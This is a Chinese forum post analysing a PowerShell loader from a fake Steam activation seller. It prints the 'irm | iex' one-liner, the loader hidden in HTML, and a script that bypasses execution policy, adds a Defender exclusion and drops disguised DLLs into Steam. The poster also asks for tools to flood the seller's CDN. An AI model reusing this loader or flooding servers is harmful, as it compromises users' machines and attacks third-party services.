pdd 店家假激活要求输入这个命令
```
irm steam.*** | iex
```
尝试浏览器直接访问这个 steam 网站,直接跳转到了真 steam 思路错误 然后把管道符号|去掉 发现拉去的还是 html ,发现有些不对,于是把
```
irm steam.***
```
的玩意全部一股脑扔进 vscode 然后折叠 html 发现了这个玩意
```
#>
irm steam.***/pwsDwFile/new -OutFile x.ps1
powershell.exe -ExecutionPolicy Bypass -File x.ps1;
<#
```
使用 powershell 绕过执行策略的限制
这里我最开始没发现问题,看了半天 html 都快傻眼了,代码还能混淆进 html ?最后反向思考肯定得用 powershell 才能执行接下来的脚本,于是搜搜 powershell 关键字给我找出来上面那两玩意,前面那句居然是藏在 html 里面的,后面那句没有隐藏,vscode 折叠一下就看见 powershell 了
继续跟进 x.ps1
```
cls
$filePathToDelete = Join-Path $env:USERPROFILE "x.ps1"
if (Test-Path $filePathToDelete) {
Remove-Item -Path $filePathToDelete
}
$desktopFilePathToDelete = Join-Path ([System.Environment]::GetFolderPath('Desktop')) "x.ps1"
if (Test-Path $desktopFilePathToDelete) {
Remove-Item -Path $desktopFilePathToDelete
}
```
把自己删了
```
$steamRegPath = 'HKCU:\Software\Valve\Steam'
```
搜搜 steam
```
$localPath = -join ($env:LOCALAPPDATA,"\SteamActive")
if ((Test-Path $steamRegPath)) {
$properties = Get-ItemProperty -Path $steamRegPath
if ($properties.PSObject.Properties.Name -contains 'SteamPath') {
$steamPath = $properties.SteamPath
}
}
```
让用户关掉授权
```
if (-not ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
Write-Host "[请重新打开 Power shell 打开方式以管理员身份运行]" -ForegroundColor:red
exit
}
function PwStart() {
if(Get-Process "360Tray*" -ErrorAction Stop){
while(Get-Process 360Tray* -ErrorAction Stop){
Write-Host "[请先退出 360 安全卫士]" -ForegroundColor:Red
Start-Sleep 1.5
}
PwStart
}
if(Get-Process "360sd*" -ErrorAction Stop)
{
while(Get-Process 360sd* -ErrorAction Stop){
Write-Host "[请先退出 360 杀毒]" -ForegroundColor:Red
Start-Sleep 1.5
}
PwStart
}
```
这句话很奇怪,实际上虚拟机里面没有 steam 并没有执行?
```
if ($steamPath -eq ""){
Write-Host "[请检查您的 Steam 是否正确安装]" -ForegroundColor:Red
exit
}
```
关掉 steam
```
Write-Host "[SerferStart OK]" -ForegroundColor:green
Stop-Process -Name steam* -Force -ErrorAction Stop
Start-Sleep 2
if(Get-Process steam* -ErrorAction Stop){
TASKKILL /F /IM "steam.exe" | Out-Null
Start-Sleep 2
}
if (!(Test-Path $localPath)) {
md $localPath | Out-Null
if (!(Test-Path $localPath)) {
New-Item $localPath -ItemType directory -Force | Out-Null
}
}
$catchPath = -join ($steamPath,"\package\data")
if ((Test-Path $catchPath)) {
if ((Test-Path $catchPath)) {
Remove-Item $catchPath -Recurse -Force | Out-Null
}
}
```
添加免杀
```
try{
Add-MpPreference -ExclusionPath $steamPath -ErrorAction Stop
Start-Sleep 3
}catch{}
Write-Host "[Result->0 OK]" -ForegroundColor:green
```
删掉其他家的 dll ?
```
try{
$d = $steamPath + "/fersion.dll"
if (Test-Path $d) {
Remove-Item $d -Recurse -Force -ErrorAction Stop | Out-Null #清除文件
}
$d = $steamPath + "/user32.dll"
if (Test-Path $d) {
Remove-Item $d -Recurse -Force -ErrorAction Stop | Out-Null #清除文件
}
$d = $steamPath + "/hid.dll"
if (Test-Path $d) {
Remove-Item $d -Recurse -Force -ErrorAction Stop | Out-Null #清除文件
}
}catch{
Write-Host "[异常残留请检查[$d]文件是否异常!]" -ForegroundColor:red
exit
}
```
下 pdf 假装?话说老哥们有啥可以刷网络的工具么,其实我有点想刷上一波把他 cdn 刷干净,但是限速 2m 并且单 ip 限 1 个线程
```
$downloadData = "http://steam.***/pwsDwFile/bcfc1e52ca77ad82122dfe4c9560f3ec.pdf"
$downloadLink = "http://steam.***/pwsDwFile/9b96dab2bb0ba18d56068fabc5b17185.pdf"
irm -Uri $downloadLink -OutFile $d -ErrorAction Stop
Write-Host "[Result->1 OK]" -ForegroundColor:green
$d = $localPath + "/hid"
irm -Uri $downloadData -OutFile $d -ErrorAction Stop
Write-Host "[Result->2 OK]" -ForegroundColor:green
Start-Sleep 1
```
重新打开 steam
```
Start steam://
Write-Host "[连接服务器成功请在 Steam 输入激活码 3 秒后自动关闭]" -ForegroundColor:green
Start-Sleep 3
exit
|
}
```
整体看下来就是给 steam 添加了两个文件,可是看起来并没有进行注入什么的啊,我理解就需要 dll 时候是先拉文件目录内的 dll 进行执行?这样才能解释为啥就是只添加了两个文件? |
|
